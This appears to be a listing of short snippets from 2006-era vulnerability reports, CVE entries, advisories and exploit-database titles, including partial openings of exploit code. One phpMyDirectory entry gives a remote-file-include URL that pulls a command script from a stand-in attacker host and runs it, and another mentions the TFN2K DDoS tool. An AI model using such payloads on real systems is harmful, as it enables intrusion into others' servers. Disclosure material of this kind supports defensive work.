Buffer overflow

Multiple buffer overflows in the 1 main function in a client.c, and the 2 serversetup and 3 serverclientconnect functions in b server.c in gxine 0.5.9 and earlier allow local users to cause a denial of service daemon crash or gain privileges via a long HOME environment variable. NOTE: some of the...

CVE-2006-6769

CVE-2006-6769 applies to PHP Live! 3.2.2 and earlier, with multiple XSS flaws. Vulnerable components/files include transcripts.php (search_string parameter), index.php (l parameter), phplive/index.php (login field), and phplive/message_box.php (deptid and x parameters). Exploits describe arbitrar...

ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC

Exploit for linux platform in category dos / poc =============================================================== ProFTPD = 1.3.0a modctrls support Local Buffer Overflow PoC =============================================================== Core Security Technologies - Corelabs Advisory ProFTPD...

Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)

/ Microsoft Windows Wkssvc NetrJoinDomain2 Stack OverflowMS06-070 Exploit by cocoruderfrankruderathotmail.com,2006.11.15 page:http://ruder.cdut.net/default.asp Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to correct jmp EBX address and fixed exploit output status. Gree...

On the Windows System to achieve the DDOS attack-vulnerability warning-the black bar safety net

First said we used to attack the client and server method of configuration, using the moment the most famous of REDHAT LINUX for testing, the present attack test I'm using FEDORA CORE3, the software is the most famousDDOSattack tool TFN2K LINUX Edition, is to attack the WINDOWS Server system is...

CVE-2006-3595

The default configuration of IOS HTTP server in Cisco Router Web Setup CRWS before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190...

CVE-2006-3595

The CVE refers to Cisco Router Web Setup (CRWS) with the IOS HTTP server, affected in versions prior to 3.3.0 build 31. The issue is that the default configuration does not require credentials, allowing remote attackers to access the server with arbitrary privilege levels (bug CSCsa78190). Connec...

CVE-2006-3595

The default configuration of IOS HTTP server in Cisco Router Web Setup CRWS before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190...

Cisco Router Web Setup (CRWS) contains an insecure default IOS configuration

Overview A vulnerability in the Cisco Router Web Setup CRWS web configuration tool on some Cisco 800 and SOHO series routers may allow remote execution of system-level commands with no authentication. Description Cisco Router Web Setup Tool The Cisco Router Web Setup tool, or CRWS, provides a GUI...

Cisco Router Web Setup Ships with Insecure Default IOS Configuration

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES TH...

Cisco Router Web Setup weak default security settings

By default it's possible to access IOS Web interface without authentication with highest access security level...

[Full-disclosure] Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration Document ID: 70650 Advisory ID: cisco-sa-20060712-crws http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml Revision 1.0 For Public Release 2006...

Buffer overflow

Buffer overflow in eBay Enhanced Picture Services aka EPUImageControl Class in EUPWALcontrol.dll before 1.0.3.48, as used in Sell Your Item SYI, Setup & Test eBay Enhanced Picture Services, Picture Manager Enhanced Uploader, and CARad.com Add Vehicle, allows remote attackers to execute arbitrary...

Mandrake Linux Security Advisory : gdm (MDKSA-2006:100)

A vulnerability in gdm could allow a user to activate the gdm setup program if the administrator configured a gdm theme that provided a user list. The user could do so by choosing the setup option from the menu, clicking the user list, then entering his own password instead of root's. The updated...

Microsoft Windows XP/2000 - &#039;Mrxsmb.sys&#039; Local Privilege Escalation (MS06-030)

/////////////////////////////////////////////////////////////////////////////////////// // Mrxsmb.sys XP & 2K Ring0 Exploit 6/12/2005 // Tested on XP SP2 && 2K SP4 // Disable ReadOnly Memory protection // HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtecti...

Squirrelmail local file inclusion

Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...

phpmydir1044.txt

ENGLISH Title : phpMyDirectory = 10.4.4 Multiple Remote File Include Vulnerabilities Dork : "powered by phpmydirectory" Author : ajann greetz : Nukedx,TheHacker Exploit; http://target/path/template/default/footer.php?ROOTPATH=http://yourhost.com/cmd.txt?cmd=ls...

[SA19589] Debian mnogosearch Insecure Password Storage Security Issue

TITLE: Debian mnogosearch Insecure Password Storage Security Issue SECUNIA ADVISORY ID: SA19589 VERIFY ADVISORY: http://secunia.com/advisories/19589/ CRITICAL: Moderately critical IMPACT: Exposure of sensitive information WHERE: Local system OPERATING SYSTEM: Debian GNU/Linux 3.1...

DEBIAN-CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...